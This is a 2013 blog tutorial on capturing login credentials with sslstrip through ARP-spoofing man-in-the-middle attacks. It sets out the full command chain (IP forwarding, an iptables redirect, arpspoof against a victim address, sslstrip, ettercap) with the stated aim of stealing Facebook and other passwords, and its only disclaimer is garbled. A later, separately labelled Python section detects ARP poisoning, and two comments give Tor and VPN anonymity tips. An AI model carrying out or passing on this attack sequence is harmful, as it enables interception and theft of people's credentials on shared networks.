
Tuesday, August 6, 2013

SSLSTRIP to capture credentials - Man-in-the-middle attack

Hello to all
Today I will show how to use the sslstrip tool to perform a MITM (man-in-the-middle) attack, in which the data exchanged between two parties is intercepted by the attacker. That way we can steal passwords for Facebook, or for any other non-secure authentication page.
To perform this attack I used, as the "man in the middle", a machine running Kali Linux, a Linux distribution made specifically for pentesting.
If you need help installing and configuring this tool, see here.
My test uses the following scenario; to try it yourself, simply adapt it to your own scenario.
Victim IP: 192.168.2.12
Default gateway IP: 192.168.2.2
Let's go!
Using Kali Linux, open 4 terminals and log in as "root" in each of them using the command "sudo su". Note: I think this makes it easier for those who may not have much experience with Linux; if you have the experience, use the terminals as you see fit.
In the first terminal, type the following command:
echo 1 > /proc/sys/net/ipv4/ip_forward (enables packet forwarding)
In the second terminal, type the following:
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 1000 (redirects packets from port 80 to port 1000 on the attacker's machine)
In the third terminal, type:
arpspoof -i eth0 -t 192.168.2.12 192.168.2.2 (remember to adapt this to your environment; this command "poisons" the victim's ARP table, causing the victim to send all traffic bound for the gateway to the attacker)
In the fourth terminal, type the following:
sslstrip -l 1000 (listens for all the data arriving on port 1000)
Back in the first terminal, type the following:
ettercap -Tq -i eth0 (here is where we see what we want)
After this step, the "victim" should access any website that needs authentication: Gmail, Hotmail, Facebook, Twitter, etc.
If everything was done correctly, you will get a screen similar to this.
[Image: screenshot of the captured login and password]
As you can see in the image above, marked in red, after the victim authenticates, the person's login and password are displayed.
Remember that this should only be done in a controlled environment or without proper.
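From the defender's side, the arpspoof step above leaves a visible trace in the victim's ARP table: the gateway IP resolves to a different MAC address. The following is an added example, not part of the original post, that checks a table in /proc/net/arp format for this; the sample table, the addresses 192.168.2.50 and 192.168.2.77, all MAC values and the recorded baseline MAC are constructed assumptions.

```python
# Added example: check a host's ARP table for the gateway poisoning above.
# Constructed sample in /proc/net/arp format, as the victim 192.168.2.12 could
# see it while poisoned. 192.168.2.50, .77 and every MAC below are made up.
SAMPLE_ARP_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.2.2      0x1         0x2         08:00:27:aa:bb:cc     *        eth0
192.168.2.50     0x1         0x2         08:00:27:AA:BB:CC     *        eth0
192.168.2.30     0x1         0x2         08:00:27:11:22:33     *        eth0
192.168.2.77     0x1         0x0         00:00:00:00:00:00     *        eth0
"""
BASELINE_GATEWAY_MAC = "08:00:27:de:ad:01"  # assumed: recorded on a trusted network


def parse_arp_table(text):
    """Return {ip: mac} for resolved entries (flag bit 0x2, ATF_COM)."""
    entries = {}
    for line in text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, _hw_type, flags, mac = fields[:4]
        if int(flags, 16) & 0x2:
            entries[ip] = mac.lower()
    return entries


def check_gateway(entries, gateway_ip, baseline_mac=None):
    """Return a list of findings; an empty list means nothing suspicious."""
    gw_mac = entries.get(gateway_ip)
    if gw_mac is None:
        return [f"gateway {gateway_ip} has no resolved ARP entry"]
    findings = []
    # Reliable check: the gateway's MAC differs from the recorded baseline.
    if baseline_mac and gw_mac != baseline_mac.lower():
        findings.append(f"gateway MAC changed: {baseline_mac.lower()} -> {gw_mac}")
    # Opportunistic check: another IP answers with the gateway's MAC, which
    # happens when the spoofing host's real address is also in the table.
    twins = sorted(ip for ip, mac in entries.items()
                   if mac == gw_mac and ip != gateway_ip)
    if twins:
        findings.append(f"gateway MAC {gw_mac} also claimed by {', '.join(twins)}")
    return findings


if __name__ == "__main__":
    for finding in check_gateway(parse_arp_table(SAMPLE_ARP_TABLE),
                                 "192.168.2.2", BASELINE_GATEWAY_MAC):
        print("ALERT:", finding)
```

On a live Linux host, pass the contents of /proc/net/arp instead of the sample. A shared MAC can also be legitimate when one device holds several addresses, so treat that finding as a lead to verify.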

2 comments:

 

Is TOR Secure??

TOR is not safe to hack!! With putting too much security in the middle, you increase the risk of malicious traffic from the end station going undetected through this tight-secure loop. It's a general rule when traffic moves from higher trust to lower trust, the nature of protection provided on either end should be evaluated and it should match the data classification level it carries within. Try using some other VPNs!! In particular, if somebody can observe your traffic and your target's traffic, he can correlate that.

One interesting variant is connecting to a VPN over TOR. That helps with 3), provided you trust the VPN, but you need to figure out a way to buy VPN access anonymously.

Factors Affecting Anonymity Online

IP address - can be resolved by VPNs. User agent - https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/. MAC address - Technitium MAC changer. For more information be have anonymous service online. Please visit http://prism-break.org/
